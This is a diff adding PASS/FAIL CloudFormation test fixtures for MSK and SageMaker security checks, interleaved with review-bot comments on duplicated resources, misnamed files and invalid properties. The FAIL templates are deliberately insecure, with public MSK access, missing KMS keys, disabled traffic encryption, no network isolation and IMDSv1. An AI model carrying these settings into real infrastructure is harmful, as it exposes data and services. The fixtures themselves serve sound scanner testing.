@@ -0,0 +1,37 @@ +Resources: + MSKClusterPASSTLS: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml new file mode 100644 index 00000000000..eb2b5c54f7d --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml 
@@ -0,0 +1,73 @@ +Resources: + MSKClusterFAILempty: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" + MSKClusterFAILdeclared: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml new file mode 100644 index 00000000000..62d1b0ef11f --- /dev/null 
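Review bot: `MSKClusterFAILempty` and `MSKClusterFAILdeclared` are identical apart from their names — neither carries a `LoggingInfo` block — so the second resource does not exercise a "declared but disabled" logging case and only duplicates the first. Either give `MSKClusterFAILdeclared` a `LoggingInfo` whose `BrokerLogs` targets are all `Enabled: False` (the PASS file's `MSKClusterPASSskip` shows the shape), or drop it. The file is also named `MSKClusterNodesArePrivate-FAIL.yaml` although it lives under `example_MSKClusterLogging`, as is its PASS twin; renaming both to match the directory avoids confusion with the real NodesArePrivate fixtures added in the same commit.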
+++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterLogging/MSKClusterNodesArePrivate-PASS.yaml @@ -0,0 +1,51 @@ +Resources: + MSKClusterPASS: + Type: AWS::MSK::Cluster + Properties: + BrokerNodeGroupInfo: + ClientSubnets: + - String + InstanceType: kafka.m5.8xlarge + ClusterName: String + EnhancedMonitoring: DEFAULT + KafkaVersion: String + LoggingInfo: + BrokerLogs: + CloudWatchLogs: + Enabled: True + LogGroup: String + Firehose: + DeliveryStream: String + Enabled: True + S3: + Bucket: String + Enabled: True + Prefix: String + NumberOfBrokerNodes: 3 + Tags: + Key: Value + MSKClusterPASSskip: + Type: AWS::MSK::Cluster + Properties: + BrokerNodeGroupInfo: + ClientSubnets: + - String + InstanceType: kafka.m5.8xlarge + ClusterName: String + EnhancedMonitoring: DEFAULT + KafkaVersion: String + LoggingInfo: + BrokerLogs: + CloudWatchLogs: + Enabled: False + LogGroup: String + Firehose: + DeliveryStream: String + Enabled: True + S3: + Bucket: String + Enabled: True + Prefix: String + NumberOfBrokerNodes: 5 + Tags: + Key: Value diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml new file mode 100644 index 00000000000..9c98c3e79c5 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-FAIL.yaml 
@@ -0,0 +1,57 @@ +Resources: + MSKCluster: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" + + MSKCluster2: + Type: AWS::MSK::Cluster + Properties: + BrokerNodeGroupInfo: + BrokerAZDistribution: String + ClientSubnets: + - String + ConnectivityInfo: + PublicAccess: + Type: SERVICE_PROVIDED_EIPS + InstanceType: String + SecurityGroups: + - String + ClusterName: String + EnhancedMonitoring: DEFAULT + KafkaVersion: String + NumberOfBrokerNodes: 5 + Tags: + Key: Value diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml new file mode 100644 index 00000000000..28c3db15da3 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterNodesArePrivate/MSKClusterNodesArePrivate-PASS.yaml 
@@ -0,0 +1,70 @@ +Resources: + MSKClusterPASS: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "DISABLED" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" + MSKClusterPASS2: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "TLS" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" \ No newline at end of file diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml new file mode 100644 index 00000000000..843016df1d9 --- /dev/null 
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-FAILED.yaml @@ -0,0 +1,40 @@ +AWSTemplateFormatVersion: '2010-09-09' +Resources: + MySageMakerRole: + Type: "AWS::IAM::Role" + Properties: + AssumeRolePolicyDocument: + Version: "2012-10-17" + Statement: + - Effect: "Allow" + Principal: + Service: + - "sagemaker.amazonaws.com" + Action: + - "sts:AssumeRole" + + MyDataQualityJobDefinitionFail: + Type: "AWS::SageMaker::DataQualityJobDefinition" + Properties: + JobDefinitionName: "MyDataQualityJob" + RoleArn: !GetAtt MySageMakerRole.Arn + DataQualityAppSpecification: + ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest" + DataQualityJobInput: + EndpointInput: + EndpointName: "my-endpoint" + LocalPath: "/opt/ml/processing/input" + DataQualityJobOutputConfig: + MonitoringOutputs: + - S3Output: + S3Uri: "s3://my-sagemaker-bucket/output" + LocalPath: "/opt/ml/processing/output" + S3UploadMode: "Continuous" + JobResources: + ClusterConfig: + InstanceCount: 1 + InstanceType: "ml.m5.xlarge" + VolumeSizeInGB: 20 + VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id" # Volume-specific KMS Key ID + StoppingCondition: + MaxRuntimeInSeconds: 3600 diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml new file mode 100644 index 00000000000..25f167320ef --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/SagemakerDataQualityJobDefinitionEncryption-PASSED.yaml 
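Review bot: The FAILED fixture sets `VolumeKmsKeyId` on the cluster config but omits `KmsKeyId` under `DataQualityJobOutputConfig`, and that one key is the only difference from the PASSED fixture, yet nothing in the file says so. A comment at the `DataQualityJobOutputConfig:` line, e.g. `# no KmsKeyId here: output data is left unencrypted even though the volume key below is set`, would make the tested property explicit; the inline `# Volume-specific KMS Key ID` note otherwise reads as if the KMS configuration were complete.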
@@ -0,0 +1,41 @@ +AWSTemplateFormatVersion: '2010-09-09' +Resources: + MySageMakerRole: + Type: "AWS::IAM::Role" + Properties: + AssumeRolePolicyDocument: + Version: "2012-10-17" + Statement: + - Effect: "Allow" + Principal: + Service: + - "sagemaker.amazonaws.com" + Action: + - "sts:AssumeRole" + + MyDataQualityJobDefinitionPass: + Type: "AWS::SageMaker::DataQualityJobDefinition" + Properties: + JobDefinitionName: "MyDataQualityJob" + RoleArn: !GetAtt MySageMakerRole.Arn + DataQualityAppSpecification: + ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest" + DataQualityJobInput: + EndpointInput: + EndpointName: "my-endpoint" + LocalPath: "/opt/ml/processing/input" + DataQualityJobOutputConfig: + KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id" + MonitoringOutputs: + - S3Output: + S3Uri: "s3://my-sagemaker-bucket/output" + LocalPath: "/opt/ml/processing/output" + S3UploadMode: "Continuous" + JobResources: + ClusterConfig: + InstanceCount: 1 + InstanceType: "ml.m5.xlarge" + VolumeSizeInGB: 20 + VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id" # Volume-specific KMS Key ID + StoppingCondition: + MaxRuntimeInSeconds: 3600 diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml new file mode 100644 index 00000000000..ed0a29af1d8 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-FAILED.yaml 
@@ -0,0 +1,55 @@
+Resources:
+ DataQualityJobDefinitionFail1:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJobDefinition"
+ DataQualityBaselineConfig:
+ BaseliningJobName: "MyBaselineJob"
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "MyEndpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-bucket/output/"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "EndOfJob"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 1
+ InstanceType: ml.m5.large
+ VolumeSizeInGB: 50
+ RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+ NetworkConfig:
+ EnableInterContainerTrafficEncryption: false
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
+ DataQualityJobDefinitionFail2:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJobDefinition"
+ DataQualityBaselineConfig:
+ BaseliningJobName: "MyBaselineJob"
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "MyEndpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-bucket/output/"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "EndOfJob"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 1
+ InstanceType: ml.m5.large
+ VolumeSizeInGB: 50
+ RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml
new file mode 100644
index 00000000000..5bf80ef36f9
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/SagemakerDataQualityJobDefinitionTrafficEncryption-PASSED.yaml
@@ -0,0 +1,29 @@
+Resources:
+ DataQualityJobDefinitionPass:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJobDefinition"
+ DataQualityBaselineConfig:
+ BaseliningJobName: "MyBaselineJob"
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "MyEndpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-bucket/output/"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "EndOfJob"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 1
+ InstanceType: ml.m5.large
+ VolumeSizeInGB: 50
+ RoleArn: "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+ NetworkConfig:
+ EnableInterContainerTrafficEncryption: true
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml
new file mode 100644
index 00000000000..fd70539cdbe
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-FAILED.yaml 
@@ -0,0 +1,66 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+ MySageMakerRole:
+ Type: "AWS::IAM::Role"
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: "2012-10-17"
+ Statement:
+ - Effect: "Allow"
+ Principal:
+ Service:
+ - "sagemaker.amazonaws.com"
+ Action:
+ - "sts:AssumeRole"
+
+ MyDataQualityJobDefinitionFail1:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJob"
+ RoleArn: !GetAtt MySageMakerRole.Arn
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "my-endpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-sagemaker-bucket/output"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "Continuous"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 1
+ InstanceType: "ml.m5.xlarge"
+ VolumeSizeInGB: 20
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
+
+ MyDataQualityJobDefinitionFail2:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJob"
+ RoleArn: !GetAtt MySageMakerRole.Arn
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "my-endpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-sagemaker-bucket/output"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "Continuous"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 2
+ InstanceType: "ml.m5.xlarge"
+ VolumeSizeInGB: 30
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml
new file mode 100644
index 00000000000..429638d1c63
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml
@@ -0,0 +1,41 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+ MySageMakerRole:
+ Type: "AWS::IAM::Role"
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: "2012-10-17"
+ Statement:
+ - Effect: "Allow"
+ Principal:
+ Service:
+ - "sagemaker.amazonaws.com"
+ Action:
+ - "sts:AssumeRole"
+
+ MyDataQualityJobDefinitionPass:
+ Type: "AWS::SageMaker::DataQualityJobDefinition"
+ Properties:
+ JobDefinitionName: "MyDataQualityJob"
+ RoleArn: !GetAtt MySageMakerRole.Arn
+ DataQualityAppSpecification:
+ ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+ DataQualityJobInput:
+ EndpointInput:
+ EndpointName: "my-endpoint"
+ LocalPath: "/opt/ml/processing/input"
+ DataQualityJobOutputConfig:
+ KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+ MonitoringOutputs:
+ - S3Output:
+ S3Uri: "s3://my-sagemaker-bucket/output"
+ LocalPath: "/opt/ml/processing/output"
+ S3UploadMode: "Continuous"
+ JobResources:
+ ClusterConfig:
+ InstanceCount: 1
+ InstanceType: "ml.m5.xlarge"
+ VolumeSizeInGB: 20
+ VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-volume-kms-key-id"
+ StoppingCondition:
+ MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml
new file mode 100644
index 00000000000..2ab1d065991
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml
@@ -0,0 +1,44 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+ SageMakerExecutionRole:
+ Type: 'AWS::IAM::Role'
+ Properties:
+ RoleName: 'SageMakerExecutionRole'
+ AssumeRolePolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: 'Allow'
+ Principal:
+ Service: 'sagemaker.amazonaws.com'
+ Action: 'sts:AssumeRole'
+ Policies:
+ - PolicyName: 'SageMakerExecutionPolicy'
+ PolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: 'Allow'
+ Action:
+ - 's3:GetObject'
+ - 's3:PutObject'
+ Resource: 'arn:aws:s3:::your-s3-bucket-name/*'
+
+ SageMakerModelFail1:
+ Type: 'AWS::SageMaker::Model'
+ Properties:
+ ModelName: 'ExampleSageMakerModel'
+ ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+ PrimaryContainer:
+ Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+ Mode: 'SingleModel'
+ ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
+ EnableNetworkIsolation: false
+
+ SageMakerModelFail2:
+ Type: 'AWS::SageMaker::Model'
+ Properties:
+ ModelName: 'ExampleSageMakerModel'
+ ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+ PrimaryContainer:
+ Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+ Mode: 'SingleModel'
+ ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml
new file mode 100644
index 00000000000..8281e944787
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml
@@ -0,0 +1,34 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+ SageMakerExecutionRole:
+ Type: 'AWS::IAM::Role'
+ Properties:
+ RoleName: 'SageMakerExecutionRole'
+ AssumeRolePolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: 'Allow'
+ Principal:
+ Service: 'sagemaker.amazonaws.com'
+ Action: 'sts:AssumeRole'
+ Policies:
+ - PolicyName: 'SageMakerExecutionPolicy'
+ PolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: 'Allow'
+ Action:
+ - 's3:GetObject'
+ - 's3:PutObject'
+ Resource: 'arn:aws:s3:::your-s3-bucket-name/*'
+
+ SageMakerModelPass:
+ Type: 'AWS::SageMaker::Model'
+ Properties:
+ ModelName: 'ExampleSageMakerModel'
+ ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+ PrimaryContainer:
+ Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+ Mode: 'SingleModel'
+ ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
+ EnableNetworkIsolation: true
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml
new file mode 100644
index 00000000000..2f2fb8d24cc
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml
@@ -0,0 +1,38 @@
+Resources:
+ BasicNotebookInstancePASS:
+ Type: "AWS::SageMaker::NotebookInstance"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: "!GetAtt ExecutionRole.Arn"
+ KmsKeyId: "bla bla"
+ BasicNotebookInstanceFAIL:
+ Type: "AWS::SageMaker::NotebookInstance"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: "!GetAtt ExecutionRole.Arn"
+
+ BasicDomainPASS:
+ Metadata:
+ cfn-lint:
+ config:
+ ignore_checks:
+ - E3002
+ - E3030
+ - E3003
+ Type: "AWS::SageMaker::Domain"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: "!GetAtt ExecutionRole.Arn"
+ KmsKeyId: "bla bla"
+ BasicDomainFAIL:
+ Metadata:
+ cfn-lint:
+ config:
+ ignore_checks:
+ - E3002
+ - E3030
+ - E3003
+ Type: "AWS::SageMaker::Domain"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: "!GetAtt ExecutionRole.Arn"
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml
new file mode 100644
index 00000000000..bffa9cfe003
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml
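Review bot: `RoleArn: "!GetAtt ExecutionRole.Arn"` on all four resources is a quoted string, so it is a literal rather than an intrinsic function, and no `ExecutionRole` resource exists in the template anyway; the fixture also gives the two `AWS::SageMaker::Domain` resources `InstanceType` and `RoleArn`, which are not Domain properties, and suppresses cfn-lint E3002/E3030/E3003 to hide that. Since only `KmsKeyId` matters to the check, the fixture would be cleaner with those properties removed from the Domain resources (letting the `Metadata` suppressions go) and with an unquoted `RoleArn: !GetAtt ExecutionRole.Arn` on the notebook instances. The same `"bla bla"` placeholder for `KmsKeyId` is fine for the check, but a `# placeholder, any non-empty value passes` comment would make that intent explicit to the next reader.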
@@ -0,0 +1,31 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Description: "Create basic notebook instance"
+Resources:
+ BasicNotebookInstanceFail1:
+ Type: "AWS::SageMaker::NotebookInstance"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: !GetAtt ExecutionRole.Arn
+ InstanceMetadataServiceConfiguration:
+ MinimumInstanceMetadataServiceVersion: "1"
+ BasicNotebookInstanceFail2:
+ Type: "AWS::SageMaker::NotebookInstance"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: !GetAtt ExecutionRole.Arn
+ ExecutionRole:
+ Type: "AWS::IAM::Role"
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: "2012-10-17"
+ Statement:
+ -
+ Effect: "Allow"
+ Principal:
+ Service:
+ - "sagemaker.amazonaws.com"
+ Action:
+ - "sts:AssumeRole"
+ Path: "/"
+ ManagedPolicyArns:
+ - !Sub "arn:${AWS::Partition}:iam::aws:policy/AmazonSageMakerFullAccess"
\ No newline at end of file
